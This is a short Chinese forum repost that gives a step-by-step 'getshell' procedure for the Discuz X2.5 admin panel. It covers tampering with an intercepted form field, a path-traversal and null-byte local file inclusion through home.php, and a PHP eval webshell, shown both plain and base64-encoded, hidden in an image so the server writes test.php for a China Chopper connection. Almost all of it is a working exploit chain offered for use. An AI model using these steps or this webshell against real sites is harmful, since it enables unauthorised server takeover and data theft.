discuz 最新后台getshell

原帖地址内容：
http://zone.wooyun.org/content/3894

用户 �C 用户栏目 �C 栏目分组 �C 提交 �C 抓包 (我就是在这步出错的，一定要提交，不然抓到的数据包不一样)

1 Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改为

1 Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问

1	/home.php?mod=spacecp&id=../../robots.txt%0057

本地测试dzx2.5抓包 把base改为下图中的plugin

测试环境中，上传的一句话木马菜刀连接失败，最后改为了base64加密

//加密前的内容
<?php @eval(fputs(fopen('./test.php','w+'),'<?php eval($_POST[c]);?>');));?>
//加密后的内容
<?php @eval(base64_decode('ZnB1dHMoZm9wZW4oJy4vdGVzdC5waHAnLCd3KycpLCc8P3BocCBldmFsKCRfUE9TVFtjXSk7Pz4nKTs='));?>

合成图片木马，上传，

/home.php?mod=spacecp&id=../../图片马地址%0057

在当前目录下生成了test.php，菜刀连接之...